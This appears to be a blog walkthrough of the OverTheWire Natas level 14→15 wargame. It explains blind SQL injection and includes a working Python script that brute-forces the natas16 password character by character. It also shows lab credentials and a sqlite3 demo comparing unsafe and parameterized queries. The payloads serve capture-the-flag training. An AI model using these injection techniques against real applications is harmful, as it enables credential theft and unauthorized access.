OverTheWire Natas Level 14 -> Level 15 - Walkthrough

Introduction

In this post, I'll walk you through the natas wargame Level 14 -> Level 15. We will look at a blind SQL injection vulnerability and use a Python script to recover the password for the next level.

Goal

Log in to natas15 and get the password for the next level.

Login details

URL - http://natas15.natas.labs.overthewire.org
Username - natas15
Password - TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB

Theory

Blind SQL injection is similar to the SQL injection we saw in the previous level. The difference is that the application does not display query results; it only reveals whether the query evaluated to true or false, and the attacker infers the answer from that. This makes exploitation more difficult, but not impossible.

Because the information comes back one piece at a time, such cases are usually handled with a brute-force script. So we will write a Python script to brute-force the password.

Solution

Open the URL in a browser. Enter the username and password mentioned above.


The screen below appears after logging in successfully. It asks for a username and tells you whether that user exists.


Let's look at the source code. Click "View sourcecode".


The code checks the username entered in the form and outputs whether that user exists.
Notice the comment in the code stating that a table named "users" was created with "username" and "password" as columns. So we need to find the password of the natas16 user.

The query in the source code is equivalent to:
SELECT * from users where username="username";

The username is placed inside double quotes and is not properly sanitized, so we can close the quote and append our own conditions to the query. We need to craft input that asks questions like "does the password for natas16 start with A?" and read the answer from the web application's response.

The resulting query looks like:
SELECT * from users where username="natas16" and password like binary "x%";

This tells us whether the password starts with the specified character, so we can recover the password one character at a time. The "binary" keyword makes the LIKE comparison case sensitive; without it, MySQL's default collation would treat "T" and "t" as the same character.
Enter - natas16" and password like binary "T% - in the username field to see the output.
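To see why the quoting matters, here is an added example (not part of the original walkthrough or the natas source) using Python's sqlite3 and a constructed "users" table: the unsafe function pastes the username into the SQL text as natas15 does, while the hardened one binds it as a parameter so the same input is treated as a literal username. The sample natas16 password and the single-quote form of the probe are assumptions for this demo, since SQLite reserves double quotes for identifiers and has no BINARY keyword.

```python
import sqlite3

# Constructed sample table standing in for natas' "users" table.
# The natas16 password here is made up for the demo, not the real one.
SAMPLE_USERS = [
    ("natas15", "TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB"),
    ("natas16", "Example0nlyNotTheRealPassword"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def user_exists_unsafe(conn, username):
    # Mirrors natas15: the input is pasted straight into the SQL text.
    # Single quotes are used because SQLite reserves double quotes for
    # identifiers; the injection mechanism is the same as on natas.
    sql = f"SELECT * FROM users WHERE username='{username}'"
    return conn.execute(sql).fetchone() is not None


def user_exists_safe(conn, username):
    # Hardened form: the value is bound as a parameter, so quotes inside
    # it are data, never SQL syntax.
    sql = "SELECT * FROM users WHERE username=?"
    return conn.execute(sql, (username,)).fetchone() is not None


def demo():
    conn = make_db()
    # The walkthrough's probe in SQLite quoting: "does the natas16 password
    # start with E?" (SQLite's LIKE is case-insensitive; MySQL needs BINARY)
    probe_hit = "natas16' AND password LIKE 'E%"
    probe_miss = "natas16' AND password LIKE 'Z%"
    return {
        "plain_unsafe": user_exists_unsafe(conn, "natas16"),
        "plain_safe": user_exists_safe(conn, "natas16"),
        "probe_hit_unsafe": user_exists_unsafe(conn, probe_hit),    # True: oracle leaks a char
        "probe_miss_unsafe": user_exists_unsafe(conn, probe_miss),  # False: wrong guess
        "probe_hit_safe": user_exists_safe(conn, probe_hit),        # False: literal username
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```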


To automate this, we will write a Python script to recover the password. Save the script below to a file and run it.
import requests
import sys
from string import digits, ascii_lowercase, ascii_uppercase

url = "http://natas15.natas.labs.overthewire.org/"
# Character set tried at each position (letters and digits)
characters = ascii_lowercase + ascii_uppercase + digits
# Prefix that closes the username string and appends our LIKE condition
qry = 'natas16" AND password LIKE BINARY "'
s = requests.Session()
s.auth = ('natas15', 'TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB')
password = ""
while len(password) < 32:
    for c in characters:
        # Ask: does the password start with the characters found so far plus c?
        r = s.post(url, data={'username': qry + password + c + "%"})
        if "This user exists" in r.text:
            sys.stdout.write(c)
            sys.stdout.flush()
            password += c
            break
    else:
        # No character matched at this position: stop instead of looping forever
        print("\nNo match for position", len(password) + 1)
        break
print("\nPassword:", password)

The script uses the requests library to open a session to the natas15 URL with HTTP basic authentication. Based on the previous natas passwords, we assume the natas16 password is 32 characters long and run the while loop until that many characters have been found. The for loop tries each character in the query; when the application reports that the user exists, the character is printed on the screen and appended to the password variable, which is used as the prefix in the next iteration.

I have run the script on a Linux platform using the command below:
python3 natas15.py

It will take a few minutes to produce the output since it is brute-forcing one character at a time.


This completes the walkthrough for natas Level 15, as we have obtained the password for the next level. Please post your questions and doubts in the comments section. Also, learn Python or another scripting language so you can write such scripts yourself and get better at cybersecurity.

